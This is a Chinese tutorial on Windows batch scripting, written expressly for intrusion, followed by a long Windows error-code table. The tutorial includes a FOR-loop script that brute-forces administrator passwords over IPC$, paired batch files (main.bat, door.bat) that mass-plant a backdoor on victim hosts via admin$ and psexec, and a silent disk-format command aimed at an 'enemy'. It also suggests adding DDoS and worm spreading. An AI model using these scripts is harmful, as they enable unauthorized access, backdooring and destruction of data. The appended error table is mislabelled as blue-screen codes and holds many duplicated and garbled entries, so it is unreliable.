最近对于批处理技术的探讨比较热,也有不少好的批处理程序发布,但是如果没有一定的相关知识恐怕不容易看懂和理解这些批处理文件,也就更谈不上自己动手编写了,古语云:“授人以鱼,不如授人以渔。”因为网上好像并没有一个比较完整的教材,所以抽一点时间写了这片<>给新手朋友们.也献给所有为实现网络的自由与共享而努力的朋友们. 批处理文件是无格式的文本文件,它包含一条或多条命令。它的文件扩展名为 .bat 或 .cmd。在命令提示下键入批处理文件的名称,或者双击该批处理文件,系统就会调用Cmd.exe按照该文件中各个命令出现的顺序来逐个运行它们。使用批处理文件(也被称为批处理程序或脚本),可以简化日常或重复性任务。当然我们的这个版本的主要内容是介绍批处理在入侵中一些实际运用,例如我们后面要提到的用批处理文件来给系统打补丁、批量植入后门程序等。下面就开始我们批处理学习之旅吧。 一.简单批处理内部命令简介 1.Echo 命令 打开回显或关闭请求回显功能,或显示消息。如果没有任何参数,echo 命令将显示当前回显设置。 语法 echo [{on|off}] [message] Sample:@echo off / echo hello world 在实际应用中我们会把这条命令和重定向符号(也称为管道符号,一般用> >> ^)结合来实现输入一些命令到特定格式的文件中.这将在以后的例子中体现出来。 2.@ 命令 表示不显示@后面的命令,在入侵过程中(例如使用批处理来格式化敌人的硬盘)自然不能让对方看到你使用的命令啦。 Sample:@echo off @echo Now initializing the program,please wait a minite... @format X: /q/u/autoset (format 这个命令是不可以使用/y这个参数的,可喜的是微软留了个autoset这个参数给我们,效果和/y是一样的。) 3.Goto 命令 指定跳转到标签,找到标签后,程序将处理从下一行开始的命令。 语法:goto label (label是参数,指定所要转向的批处理程序中的行。) Sample: if {%1}=={} goto noparms if {%2}=={} goto noparms(如果这里的if、%1、%2你不明白的话,先跳过去,后面会有详细的解释。) @Rem check parameters if null show usage :noparms echo Usage: monitor.bat ServerIP PortNumber goto end 标签的名字可以随便起,但是最好是有意义的字母啦,字母前加个:用来表示这个字母是标签,goto命令就是根据这个:来寻找下一步跳到到那里。最好有一些说明这样你别人看起来才会理解你的意图啊。 4.Rem 命令 注释命令,在C语言中相当与/*--------*/,它并不会被执行,只是起一个注释的作用,便于别人阅读和你自己日后修改。 Rem Message Sample:@Rem Here is the description. 5.Pause 命令 运行 Pause 命令时,将显示下面的消息: Press any key to continue . . . Sample: @echo off :begin copy a:*.* d:\back echo Please put a new disk into driver A pause goto begin 在这个例子中,驱动器 A 中磁盘上的所有文件均复制到d:\back中。显示的注释提示您将另一张磁盘放入驱动器 A 时,pause 命令会使程序挂起,以便您更换磁盘,然后按任意键继续处理。 6.Call 命令 从一个批处理程序调用另一个批处理程序,并且不终止父批处理程序。call 命令接受用作调用目标的标签。如果在脚本或批处理文件外使用 Call,它将不会在命令行起作用。 语法 call [[Drive:][Path] FileName [BatchParameters]] [:label [arguments]] 参数 [Drive:}[Path] FileName 指定要调用的批处理程序的位置和名称。filename 参数必须具有 .bat 或 .cmd 扩展名。 7.start 命令 调用外部程序,所有的DOS命令和命令行程序都可以由start命令来调用。 入侵常用参数: MIN 开始时窗口最小化 SEPARATE 在分开的空间内开始 16 位 Windows 程序 HIGH 在 HIGH 优先级类别开始应用程序 REALTIME 在 REALTIME 优先级类别开始应用程序 WAIT 启动应用程序并等候它结束 parameters 这些为传送到命令/程序的参数 执行的应用程序是 32-位 GUI 应用程序时,CMD.EXE 不等应用程序终止就返回命令提示。如果在命令脚本内执行,该新行为则不会发生。 8.choice 命令 choice 使用此命令可以让用户输入一个字符,从而运行不同的命令。使用时应该加/c:参数,c:后应写提示可输入的字符,之间无空格。它的返回码为1234…… 如: choice /c:dme defrag,mem,end 将显示 defrag,mem,end[D,M,E]? Sample: Sample.bat的内容如下: @echo off choice /c:dme defrag,mem,end if errorlevel 3 goto defrag (应先判断数值最高的错误码) if errorlevel 2 goto mem if errotlevel 1 goto end :defrag c:\dos\defrag goto end :mem mem goto end :end echo good bye 此文件运行后,将显示 defrag,mem,end[D,M,E]? 用户可选择d m e ,然后if语句将作出判断,d表示执行标号为defrag的程序段,m表示执行标号为mem的程序段,e表示执行标号为end的程序段,每个程序段最后都以goto end将程序跳到end标号处,然后程序将显示good bye,文件结束。 9.If 命令 if 表示将判断是否符合规定的条件,从而决定执行不同的命令。 有三种格式: 1、if "参数" == "字符串"  待执行的命令 参数如果等于指定的字符串,则条件成立,运行命令,否则运行下一句。(注意是两个等号) 如if "%1"=="a" format a: if {%1}=={} goto noparms if {%2}=={} goto noparms 2、if exist 文件名  待执行的命令 如果有指定的文件,则条件成立,运行命令,否则运行下一句。 如if exist config.sys edit config.sys 3、if errorlevel / if not errorlevel 数字  待执行的命令 如果返回码等于指定的数字,则条件成立,运行命令,否则运行下一句。 如if errorlevel 2 goto x2   DOS程序运行时都会返回一个数字给DOS,称为错误码errorlevel或称返回码,常见的返回码为0、1。 10.for 命令 for 命令是一个比较复杂的命令,主要用于参数在指定的范围内循环执行命令。 在批处理文件中使用 FOR 命令时,指定变量请使用 %%variable for {%variable|%%variable} in (set) do command [ CommandLineOptions] %variable 指定一个单一字母可替换的参数。 (set) 指定一个或一组文件。可以使用通配符。 command 指定对每个文件执行的命令。 command-parameters 为特定命令指定参数或命令行开关。 在批处理文件中使用 FOR 命令时,指定变量请使用 %%variable 而不要用 %variable。变量名称是区分大小写的,所以 %i 不同于 %I 如果命令扩展名被启用,下列额外的 FOR 命令格式会受到 支持: FOR /D %variable IN (set) DO command [command-parameters] 如果集中包含通配符,则指定与目录名匹配,而不与文件 名匹配。 FOR /R [[drive:]path] %variable IN (set) DO command [command- 检查以 [drive:]path 为根的目录树,指向每个目录中的 FOR 语句。如果在 /R 后没有指定目录,则使用当前 目录。如果集仅为一个单点(.)字符,则枚举该目录树。 FOR /L %variable IN (start,step,end) DO command [command-para 该集表示以增量形式从开始到结束的一个数字序列。 因此,(1,1,5) 将产生序列 1 2 3 4 5,(5,-1,1) 将产生 序列 (5 4 3 2 1)。 FOR /F ["options"] %variable IN (file-set) DO command FOR /F ["options"] %variable IN ("string") DO command FOR /F ["options"] %variable IN (command) DO command 或者,如果有 usebackq 选项: FOR /F ["options"] %variable IN (file-set) DO command FOR /F ["options"] %variable IN ("string") DO command FOR /F ["options"] %variable IN (command) DO command filenameset 为一个或多个文件名。继续到 filenameset 中的 下一个文件之前,每份文件都已被打开、读取并经过处理。 处理包括读取文件,将其分成一行行的文字,然后将每行 解析成零或更多的符号。然后用已找到的符号字符串变量值 调用 For 循环。以默认方式,/F 通过每个文件的每一行中分开 的第一个空白符号。跳过空白行。您可通过指定可选 "options" 参数替代默认解析操作。这个带引号的字符串包括一个或多个 指定不同解析选项的关键字。这些关键字为: eol=c - 指一个行注释字符的结尾(就一个) skip=n - 指在文件开始时忽略的行数。 delims=xxx - 指分隔符集。这个替换了空格和跳格键的 默认分隔符集。 tokens=x,y,m-n - 指每行的哪一个符号被传递到每个迭代 的 for 本身。这会导致额外变量名称的 格式为一个范围。通过 nth 符号指定 m 符号字符串中的最后一个字符星号, 那么额外的变量将在最后一个符号解析之 分配并接受行的保留文本。 usebackq - 指定新语法已在下类情况中使用: 在作为命令执行一个后引号的字符串并且 引号字符为文字字符串命令并允许在 fi 中使用双引号扩起文件名称。 sample1: FOR /F "eol=; tokens=2,3* delims=, " %i in (myfile.txt) do command 会分析 myfile.txt 中的每一行,忽略以分号打头的那些行,将 每行中的第二个和第三个符号传递给 for 程序体;用逗号和/或 空格定界符号。请注意,这个 for 程序体的语句引用 %i 来 取得第二个符号,引用 %j 来取得第三个符号,引用 %k 来取得第三个符号后的所有剩余符号。对于带有空格的文件 名,您需要用双引号将文件名括起来。为了用这种方式来使 用双引号,您还需要使用 usebackq 选项,否则,双引号会 被理解成是用作定义某个要分析的字符串的。 %i 专门在 for 语句中得到说明,%j 和 %k 是通过 tokens= 选项专门得到说明的。您可以通过 tokens= 一行 指定最多 26 个符号,只要不试图说明一个高于字母 z 或 Z 的变量。请记住,FOR 变量是单一字母、分大小写和全局的; 同时不能有 52 个以上都在使用中。 您还可以在相邻字符串上使用 FOR /F 分析逻辑;方法是, 用单引号将括号之间的 filenameset 括起来。这样,该字符 串会被当作一个文件中的一个单一输入行。 最后,您可以用 FOR /F 命令来分析命令的输出。方法是,将 括号之间的 filenameset 变成一个反括字符串。该字符串会 被当作命令行,传递到一个子 CMD.EXE,其输出会被抓进 内存,并被当作文件分析。因此,以下例子: FOR /F "usebackq delims==" %i IN (`set`) DO @echo %i 会枚举当前环境中的环境变量名称。 另外,FOR 变量参照的替换已被增强。您现在可以使用下列 选项语法: ~I - 删除任何引号("),扩充 %I %~fI - 将 %I 扩充到一个完全合格的路径名 %~dI - 仅将 %I 扩充到一个驱动器号 %~pI - 仅将 %I 扩充到一个路径 %~nI - 仅将 %I 扩充到一个文件名 %~xI - 仅将 %I 扩充到一个文件扩展名 %~sI - 扩充的路径只含有短名 %~aI - 将 %I 扩充到文件的文件属性 %~tI - 将 %I 扩充到文件的日期/时间 %~zI - 将 %I 扩充到文件的大小 %~$PATH:I - 查找列在路径环境变量的目录,并将 %I 扩充 到找到的第一个完全合格的名称。如果环境变量 未被定义,或者没有找到文件,此组合键会扩充 空字符串 可以组合修饰符来得到多重结果: %~dpI - 仅将 %I 扩充到一个驱动器号和路径 %~nxI - 仅将 %I 扩充到一个文件名和扩展名 %~fsI - 仅将 %I 扩充到一个带有短名的完整路径名 %~dp$PATH:i - 查找列在路径环境变量的目录,并将 %I 扩充 到找到的第一个驱动器号和路径。 %~ftzaI - 将 %I 扩充到类似输出线路的 DIR 在以上例子中,%I 和 PATH 可用其他有效数值代替。%~ 语法 用一个有效的 FOR 变量名终止。选取类似 %I 的大写变量名 比较易读,而且避免与不分大小写的组合键混淆。 以上是MS的官方帮助,下面我们举几个例子来具体说明一下For命令在入侵中的用途。 sample2: 利用For命令来实现对一台目标Win2k主机的暴力密码破解。 我们用net use \\ip\ipc$ "password" /u:"administrator"来尝试这和目标主机进行连接,当成功时记下密码。 最主要的命令是一条:for /f i% in (dict.txt) do net use \\ip\ipc$ "i%" /u:"administrator" 用i%来表示admin的密码,在dict.txt中这个取i%的值用net use 命令来连接。然后将程序运行结果传递给find命令-- for /f i%% in (dict.txt) do net use \\ip\ipc$ "i%%" /u:"administrator"|find ":命令成功完成">>D:\ok.txt ,这样就ko了。 sample3: 你有没有过手里有大量肉鸡等着你去种后门+木马呢?,当数量特别多的时候,原本很开心的一件事都会变得很郁闷:)。文章开头就谈到使用批处理文件,可以简化日常或重复性任务。那么如何实现呢?呵呵,看下去你就会明白了。 主要命令也只有一条:(在批处理文件中使用 FOR 命令时,指定变量使用 %%variable) @for /f "tokens=1,2,3 delims= " %%i in (victim.txt) do start call door.bat %%i %%j %%k tokens的用法请参见上面的sample1,在这里它表示按顺序将victim.txt中的内容传递给door.bat中的参数%i %j %k。 而cultivate.bat无非就是用net use命令来建立IPC$连接,并copy木马+后门到victim,然后用返回码(If errorlever =)来筛选成功种植后门的主机,并echo出来,或者echo到指定的文件。 delims= 表示vivtim.txt中的内容是一空格来分隔的。我想看到这里你也一定明白这victim.txt里的内容是什么样的了。应该根据%%i %%j %%k表示的对象来排列,一般就是 ip password username。 代码雏形: --------------- cut here then save as a batchfile(I call it main.bat ) --------------------------- @echo off @if "%1"=="" goto usage @for /f "tokens=1,2,3 delims= " %%i in (victim.txt) do start call IPChack.bat %%i %%j %%k @goto end :usage @echo run this batch in dos modle.or just double-click it. :end --------------- cut here then save as a batchfile(I call it main.bat ) --------------------------- ------------------- cut here then save as a batchfile(I call it door.bat) ----------------------------- @net use \\%1\ipc$ %3 /u:"%2" @if errorlevel 1 goto failed @echo Trying to establish the IPC$ connection …………OK @copy windrv32.exe\\%1\admin$\system32 && if not errorlevel 1 echo IP %1 USER %2 PWD %3 >>ko.txt @psexec \\%1 c:\winnt\system32\windrv32.exe @psexec \\%1 net start windrv32 && if not errorlevel 1 echo %1 Backdoored >>ko.txt :failed @echo Sorry can not connected to the victim. ----------------- cut here then save as a batchfile(I call it door.bat) -------------------------------- 这只是一个自动种植后门批处理的雏形,两个批处理和后门程序(Windrv32.exe),PSexec.exe需放在统一目录下.批处理内容 尚可扩展,例如:加入清除日志+DDOS的功能,加入定时添加用户的功能,更深入一点可以使之具备自动传播功能(蠕虫).此处不多做叙述,有兴趣的朋友可自行研究. No.2 二.如何在批处理文件中使用参数 批处理中可以使用参数,一般从1%到 9%这九个,当有多个参数时需要用shift来移动,这种情况并不多见,我们就不考虑它了。 sample1:fomat.bat @echo off if "%1"=="a" format a: :format @format a:/q/u/auotset @echo please insert another disk to driver A. @pause @goto fomat 这个例子用于连续地格式化几张软盘,所以用的时候需在dos窗口输入fomat.bat a,呵呵,好像有点画蛇添足了~^_^ sample2: 当我们要建立一个IPC$连接地时候总要输入一大串命令,弄不好就打错了,所以我们不如把一些固定命令写入一个批处理,把肉鸡地ip password username 当着参数来赋给这个批处理,这样就不用每次都打命令了。 @echo off @net use \\1%\ipc$ "2%" /u:"3%" 注意哦,这里PASSWORD是第二个参数。 @if errorlevel 1 echo connection failed 怎么样,使用参数还是比较简单的吧?你这么帅一定学会了^_^.No.3 三.如何使用组合命令(Compound Command) 1.& Usage:第一条命令 & 第二条命令 [& 第三条命令...] 用这种方法可以同时执行多条命令,而不管命令是否执行成功 Sample: C:\>dir z: & dir c:\Ex4rch The system cannot find the path specified. Volume in drive C has no label. Volume Serial Number is 0078-59FB Directory of c:\Ex4rch 2002-05-14 23:51 . 2002-05-14 23:51 .. 2002-05-14 23:51 14 sometips.gif 2.&& Usage:第一条命令 && 第二条命令 [&& 第三条命令...] 用这种方法可以同时执行多条命令,当碰到执行出错的命令后将不执行后面的命令,如果一直没有出错则一直执行完所有命令; Sample: C:\>dir z: && dir c:\Ex4rch The system cannot find the path specified. C:\>dir c:\Ex4rch && dir z: Volume in drive C has no label. Volume Serial Number is 0078-59FB Directory of c:\Ex4rch 2002-05-14 23:55 . 2002-05-14 23:55 .. 2002-05-14 23:55 14 sometips.gif 1 File(s) 14 bytes 2 Dir(s) 768,671,744 bytes free The system cannot find the path specified. 在做备份的时候可能会用到这种命令会比较简单,如: dir file://192.168.0.1/database/backup.mdb && copy file://192.168.0.1/database/backup.mdb E:\backup 如果远程服务器上存在backup.mdb文件,就执行copy命令,若不存在该文件则不执行copy命令。这种用法可以替换IF exist了 :) 3.|| Usage:第一条命令 || 第二条命令 [|| 第三条命令...] 用这种方法可以同时执行多条命令,当碰到执行正确的命令后将不执行后面的命令,如果没有出现正确的命令则一直执行完所有命令; Sample: C:\Ex4rch>dir sometips.gif || del sometips.gif Volume in drive C has no label. Volume Serial Number is 0078-59FB Directory of C:\Ex4rch 2002-05-14 23:55 14 sometips.gif 1 File(s) 14 bytes 0 Dir(s) 768,696,320 bytes free 组合命令使用的例子: sample: @copy trojan.exe \\%1\admin$\system32 && if not errorlevel 1 echo IP %1 USER %2 PASS %3 >>victim.txt
下面是一系列蓝屏中可能出现的代码. 0 0x00000000 作业完成。 1 0x00000001 不正确的函数。 2 0x00000002 系统找不到指定的档案。 3 0x00000003 系统找不到指定的路径。 4 0x00000004 系统无法开启档案。 5 0x00000005 拒绝存取。 6 0x00000006 无效的代码。 7 0x00000007 储存体控制区块已毁。 8 0x00000008 储存体空间不足,无法处理这个指令。 9 0x00000009 储存体控制区块地址无效。 10 0x0000000A 环境不正确。 11 0x0000000B 尝试加载一个格式错误的程序。 12 0x0000000C 存取码错误。 13 0x0000000D 资料错误。 14 0x0000000E 储存体空间不够,无法完成这项作业。 15 0x0000000F 系统找不到指定的磁盘驱动器。 16 0x00000010 无法移除目录。 16 0x00000010 无法移除目录。 17 0x00000011 系统无法将档案移到 其它的磁盘驱动器。 18 0x00000012 没有任何档案。 19 0x00000013 储存媒体为写保护状态。 20 0x00000014 系统找不到指定的装置。 21 0x00000015 装置尚未就绪。 22 0x00000016 装置无法识别指令。 23 0x00000017 资料错误 (cyclic redundancy check) 24 0x00000018 程序发出一个长度错误的指令。 25 0x00000019 磁盘驱动器在磁盘找不到 持定的扇区或磁道。 26 0x0000001A 指定的磁盘或磁盘无法存取。 27 0x0000001B 磁盘驱动器找不到要求的扇区。 28 0x0000001C 打印机没有纸。 29 0x0000001D 系统无法将资料写入指定的磁盘驱动器。 30 0x0000001E 系统无法读取指定的装置。 31 0x0000001F 连接到系统的某个装置没有作用。 32 0x00000020 文件被另一进程使用中不能访问The process cannot access the file because it is being used by another process. 33 0x00000021 档案的一部份被锁定, 现在无法存取。 34 0x00000022 磁盘驱动器的磁盘不正确。 请将 %2 (Volume Serial Number: %3) 插入磁盘机%1。 36 0x00000024 开启的分享档案数量太多。 38 0x00000026 到达档案结尾。 39 0x00000027 磁盘已满。 50 0x00000032 不支持这种网络要求。 51 0x00000033 远程计算机无法使用。 52 0x00000034 网络名称重复。 53 0x00000035 网络路径找不到。 54 0x00000036 网络忙碌中。 55 0x00000037 特殊的网络资源或设备不可再使用The specified network resource or device is no longer available. 56 0x00000038 网络BIOS命令已达到限制The network BIOS command limit has been reached. 57 0x00000039 网络配接卡发生问题。 58 0x0000003A 指定的服务器无法执行要求的作业。 59 0x0000003B 网络发生意外错误。 60 0x0000003C 远程配接卡不兼容。 61 0x0000003D 打印机队列已满。 62 0x0000003E 服务器的空间无法储存等候打印的档案。 63 0x0000003F 等候打印的档案已经删除。 64 0x00000040 指定的网络名称无法使用。 65 0x00000041 拒绝存取网络。 65 0x00000041 拒绝存取网络。 66 0x00000042 网络资源类型错误。 67 0x00000043 网络名称找不到。 68 0x00000044 超过区域计算机网络配接卡的名称限制。 69 0x00000045 超过网络 BIOS 作业阶段的限制。 70 0x00000046 远程服务器已经暂停或者正在起始中。 71 0x00000047 由于联机数目已达上限,此时无法再联机到这台远程计算机。 72 0x00000048 指定的打印机或磁盘装置已经暂停作用。 80 0x00000050 档案已经存在。 82 0x00000052 无法建立目录或档案。 83 0x00000053 INT 2484 0x00000054 处理这项要求的储存体无法使用。 85 0x00000055 近端装置名称已经在使用中。 86 0x00000056 指定的网络密码错误。 87 0x00000057 参数错误。 88 0x00000058 网络发生资料写入错误。 89 0x00000059 此时系统无法执行其它行程。 100 0x00000064 无法建立其它的系统 semaphore。 101 0x00000065 属于其它行程专用的 semaphore. 102 0x00000066 semaphore 已经设定,而且无法关闭。 103 0x00000067 无法指定 semaphore 。 104 0x00000068 在岔断时间无法要求专用的 semaphore 。 104 0x00000068 在岔断时间无法要求专用的 semaphore 。 105 0x00000069 此 semaphore 先前的拥有权已经结束。 106 0x0000006A 请将磁盘插入 %1。 107 0x0000006B 因为代用的磁盘尚未插入,所以程序已经停止。 108 0x0000006C 磁盘正在使用中或被锁定。 109 0x0000006D Pipe 已经中止。 110 0x0000006E 系统无法开启指定的 装置或档案。 111 0x0000006F 档名太长。 112 0x00000070 磁盘空间不足。 113 0x00000071 没有可用的内部档案标识符。 114 0x00000072 目标内部档案标识符不正确。 117 0x00000075 由应用程序所执行的 IOCTL 呼叫 不正确。 118 0x00000076 写入验证参数值不正确。 119 0x00000077 系统不支持所要求的指令。 120 0x00000078 此项功能仅在 Win32 模式有效。 121 0x00000079 semaphore 超过逾时期间。 122 0x0000007A 传到系统呼叫的资料区域 太小。 123 0x0000007B 文件名、目录名称或储存体卷标语法错误。 124 0x0000007C 系统呼叫层次不正确。 125 0x0000007D 磁盘没有设定卷标。 126 0x0000007E 找不到指定的模块。 127 0x0000007F 找不到指定的程序。 128 0x00000080 没有子行程可供等待。 128 0x00000080 没有子行程可供等待。 129 0x00000081 %1 这个应用程序无法在 Win32 模式下执行。 130 0x00000082 Attempt to use a file handle to an open disk partition for an operation other than raw disk I/O. 131 0x00000083 尝试将档案指针移至档案开头之前。 132 0x00000084 无法在指定的装置或档案,设定档案指针。 133 0x00000085 JOIN 或 SUBST 指令 无法用于 内含事先结合过的磁盘驱动器。 134 0x00000086 尝试在已经结合的磁盘驱动器,使用 JOIN 或 SUBST 指令。 135 0x00000087 尝试在已经替换的磁盘驱动器,使 用 JOIN 或 SUBST 指令。 136 0x00000088 系统尝试删除 未连结过的磁盘驱动器的连结关系。 138 0x0000008A 系统尝试将磁盘驱动器结合到已经结合过之磁盘驱动器的目录。 139 0x0000008B 系统尝试将磁盘驱动器替换成已经替换过之磁盘驱动器的目录。 140 0x0000008C 系统尝试将磁盘驱动器替换成已经替换过之磁盘驱动器的目录。 141 0x000000 系统尝试将磁盘驱动器 SUBST 成已结合的磁盘驱动器 目录。 142 0x0000008E 系统此刻无法执行 JOIN 或 SUBST。 143 0x0000008F 系统无法将磁盘驱动器结合或替换同一磁盘驱动器下目录。 144 0x00000090 这个目录不是根目录的子目录。 145 0x00000091 目录仍有资料。 146 0x00000092 指定的路径已经被替换过。 147 0x00000093 资源不足,无法处理这项 指令。 148 0x00000094 指定的路径这时候无法使用。 148 0x00000094 指定的路径这时候无法使用。 149 0x00000095 尝试要结合或替换的磁盘驱动器目录,是已经替换过的的目标。 150 0x00000096 CONFIG.SYS 文件未指定系统追踪信息,或是追踪功能被取消。 151 0x00000097 指定的 semaphore事件 DosMux0000SemWait 数目不正确。 152 0x00000098 DosMux0000SemWait 没有执行;设定太多的 semaphore。 153 0x00000099 DosMux0000SemWait 清单不正确。 154 0x0000009A 您所输入的储存媒体标 元长度限制。 155 0x0000009B 无法建立其它的执行绪。 156 0x0000009C 接收行程拒绝接受信号。 157 0x0000009D 区段已经被舍弃,无法被锁定。 158 0x0000009E 区段已经解除锁定。 159 0x0000009F 执行绪识别码的地址不正确。 160 0x000000A0 传到 DosEx0000ecPgm 的自变量字符串不正确。 161 0x000000A1 指定的路径不正确。 162 0x000000A2 信号等候处理。 164 0x000000A4 系统无法建立执行绪。 167 0x000000A7 无法锁定档案的部份范围。 170 0x000000AA 所要求的资源正在使用中。 173 0x000000AD 取消范围的锁定要求不明显。 174 0x000000AE 档案系统不支持自动变更锁定类型。 180 0x000000B4 系统发现不正确的区段号码。 182 0x000000B6 操作系统无法执行 %1。 182 0x000000B6 操作系统无法执行 %1。 183 0x000000B7 档案已存在,无法建立同一档案。 186 0x000000BA 传送的旗号错误。 187 0x000000BB 指定的系统旗号找不到。 188 0x000000BC 操作系统无法执行 %1。 189 0x000000BD 操作系统无法执行 %1。 190 0x000000BE 操作系统无法执行 %1。 191 0x000000BF 无法在 Win32 模式下执行 %1。 192 0x000000C0 操作系统无法执行 %1。 193 0x000000C1 %1 不是正确的 Win32 应用程序。 194 0x000000C2 操作系统无法执行 %1。 195 0x000000C3 操作系统无法执行 %1。 196 0x000000C4 操作系统无法执行 这个应用程序。 197 0x000000C5 操作系统目前无法执行 这个应用程序。 198 0x000000C6 操作系统无法执行 %1。 199 0x000000C7 操作系统无法执行 这个应用程序。 200 0x000000C8 程序代码的区段不可以大于或等于 64KB。 201 0x000000C9 操作系统无法执行 %1。 202 0x000000CA 操作系统无法执行 %1。 203 0x000000CB 系统找不到输入的环境选项。\r 205 0x000000CD 在指令子目录下,没有任何行程有信号副处理程序。 206 0x000000CE 文件名称或扩展名太长。 207 0x000000CF ring 2 堆栈使用中。 207 0x000000CF ring 2 堆栈使用中。 208 0x000000D0 输入的通用档名字元 * 或 ? 不正确, 或指定太多的通用档名字元。 209 0x000000D1 所传送的信号不正确。 210 0x000000D2 无法设定信号处理程序。 212 0x000000D4 区段被锁定,而且无法重新配置。 214 0x000000D6 附加到此程序或动态连结模块的动态连结模块太多。 215 0x000000D7 Can’t nest calls to LoadModule. 230 0x000000E6 The pipe state is invalid. 231 0x000000E7 所有的 pipe instances 都在忙碌中。 232 0x000000E8 The pipe is being closed. 233 0x000000E9 No process is on the other end of the pipe. 234 0x000000EA 有更多可用的资料。 240 0x000000F0 作业阶段被取消。 254 0x000000FE 指定的延伸属性名称无效。 255 0x000000FF 延伸的属性不一致。 259 0x00000103 没有可用的资料。 266 0x0000010A 无法使用 Copy API。 267 0x0000010B 目录名称错误。 275 0x00000113 延伸属性不适用于缓冲区。 276 0x00000114 在外挂的档案系统上的延伸属性档案已经毁损。 277 0x00000115 延伸属性表格文件满。 278 0x00000116 指定的延伸属性代码无效。 278 0x00000116 指定的延伸属性代码无效。 282 0x0000011A 外挂的这个档案系统不支持延伸属性。 288 0x00000120 意图释放不属于叫用者的 mutex0000。 298 0x0000012A semaphore 传送次数过多。 299 0x0000012B 只完成 Read/WriteProcessMemory 的部份要求。 317 0x0000013D 系统找不到位于讯息文件 %2 中编号为 0x0000%1 的讯息。 487 0x000001E7 尝试存取无效的地址。 534 0x00000216 运算结果超过 32 位。 535 0x00000217 信道的另一端有一个行程在接送资料。 536 0x00000218 等候行程来开启信道的另一端。 994 0x000003E2 存取延伸的属性被拒。 995 0x000003E3 由于执行绪结束或应用程序要求,而异常终止 I/O 作业。 996 0x000003E4 重叠的 I/O 事件不是设定成通知状态。 997 0x000003E5 正在处理重叠的 I/O 作业。 998 0x000003E6 对内存位置的无效存取。 999 0x000003E7 执行 inpage 作业发生错误。 1001 0x000003E9 递归太深,堆栈满溢。 1002 0x000003EA 窗口无法用来传送讯息。 1003 0x000003EB 无法完成这项功能。 1004 0x000003EC 旗号无效。 1005 0x000003ED 储存媒体未含任何可辨识的档案系统。 请确定以加载所需的系统驱动程序,而且该储存媒体并未毁损。 1006 0x000003EE 储存该档案的外部媒体发出警告,表示该已开启档案已经无效。 1007 0x000003EF 所要求的作业无法在全屏幕模式下执行。 1008 0x000003F0 An attempt was made to reference a token that does not ex0000ist. 1009 0x000003F1 组态系统登录数据库毁损。 1010 0x000003F2 组态系统登录机码无效。 1011 0x000003F3 无法开启组态系统登录机码。 1012 0x000003F4 无法读取组态系统登录机码。 1013 0x000003F5 无法写入组态系统登录机码。 1014 0x000003F6 系统登录数据库中的一个档案必须使用记录或其它备份还原。 已经还原成功。 1015 0x000003F7 系统登录毁损。其中某个档案毁损、或者该档案的 系统映对内存内容毁损、会是档案无法复原。 1016 0x000003F8 系统登录起始的 I/O 作业发生无法复原的错误。 系统登录无法读入、写出或更新,其中的一个档案 内含系统登录在内存中的内容。 1017 0x000003F9 系统尝试将档案加载系统登录或将档案还原到系统登录中,但是,指定档案的格式不是系统登录文件的格式。 1018 0x000003FA 尝试在标示为删除的系统登录机码,执行不合法的操作。 1018 0x000003FA 尝试在标示为删除的系统登录机码,执行不合法的操作。 1019 0x000003FB 系统无法配置系统登录记录所需的空间。 1020 0x000003FC 无法在已经有子机码或数值的系统登录机码建立符号连结。 1021 0x000003FD 无法在临时机码下建立永久的子机码。 1022 0x000003FE 变更要求的通知完成,但信息 并未透过呼叫者的缓冲区传回。呼叫者现在需要自行列举档案,找出变更的地方。 1051 0x0000041B 停止控制已经传送给其它服务 所依峙的一个服务。 1052 0x0000041C 要求的控制对此服务无效 1016 0x000003F8 系统登录起始的 I/O 作业发生无法复原的错误。 系统登录无法读入、写出或更新,其中的一个档案 内含系统登录在内存中的内容。 1017 0x000003F9 系统尝试将档案加载系统登录或将档案还原到系统登录中,但是,指定档案的格式不是系统登录文件的格式。 1018 0x000003FA 尝试在标示为删除的系统登录机码,执行不合法的操作。 1018 0x000003FA 尝试在标示为删除的系统登录机码,执行不合法的操作。 1019 0x000003FB 系统无法配置系统登录记录所需的空间。 1020 0x000003FC 无法在已经有子机码或数值的系统登录机码建立符号连结。 1021 0x000003FD 无法在临时机码下建立永久的子机码。 1022 0x000003FE 变更要求的通知完成,但信息 并未透过呼叫者的缓冲区传回。呼叫者现在需要自行列举档案,找出变更的地方。 1051 0x0000041B 停止控制已经传送给其它服务 所依峙的一个服务。 1052 0x0000041C 要求的控制对此服务无效 1052 0x0000041C 要求的控制对此服务无效 1053 0x0000041D The service did not respond to the start or control request in a timely fashion. 1054 0x0000041E 无法建立服务的执行绪。 1055 0x0000041F 服务数据库被锁定。 1056 0x00000420 这种服务已经在执行。 1057 0x00000421 帐户名称错误或者不存在。 1058 0x00000422 指定的服务暂停作用,无法激活。 1059 0x00000423 指定循环服务从属关系。 1060 0x00000424 指定的服务不是安装进来的服务。 1061 0x00000425 该服务项目此时无法接收控制讯息。 1062 0x00000426 服务尚未激活。 1063 0x00000427 无法联机到服务控制程序。 1064 0x00000428 处理控制要求时,发生意外状况。 1065 0x00000429 指定的数据库不存在。 1066 0x0000042A 服务传回专属于服务的错误码。 1067 0x0000042B The process terminated unex0000pectedly. 1068 0x0000042C 从属服务或群组无法激活。 1069 0x0000042D 因为登入失败,所以没有激活服务。 1070 0x0000042E 在激活之后,服务在激活状态时当机。 1071 0x0000042F 指定服务数据库锁定无效。 1072 0x00000430 指定的服务已经标示为删除。 1073 0x00000431 指定的服务已经存在。 1074 0x00000432 系统目前正以上一次执行成功的组态执行。 1075 0x00000433 从属服务不存在,或已经标示为删除。 1076 0x00000434 目前的激活已经接受上一次执行成功的 控制设定。 1077 0x00000435 上一次激活之后,就没有再激活服务。 1078 0x00000436 指定的名称已经用于服务名称或服务显示 名称。 1100 0x0000044C 已经到了磁带的最后。 1101 0x0000044D 到了档案标示。 1102 0x0000044E 遇到磁带的开头或分割区。 1100 0x0000044C 已经到了磁带的最后。 1101 0x0000044D 到了档案标示。 1102 0x0000044E 遇到磁带的开头或分割区。 1103 0x0000044F 到了档案组的结尾。 1104 0x00000450 磁带没有任何资料。 1105 0x00000451 磁带无法制作分割区。 1106 0x00000452 存取多重容体的新磁带时,发现目前 区块大小错误。 1107 0x00000453 加载磁带时,找不到磁带分割区信息。 1108 0x00000454 无法锁住储存媒体退带功能。 1108 0x00000454 无法锁住储存媒体退带功能。 1109 0x00000455 无法解除加载储存媒体。 1110 0x00000456 磁盘驱动器中的储存媒体已经变更。 1111 0x00000457 已经重设 I/O 总线。 1112 0x00000458 磁盘驱动器没有任何储存媒体。 1113 0x00000459 目标 multi-byte code page,没有对应 Unicode 字符。 1114 0x0000045A 动态链接库 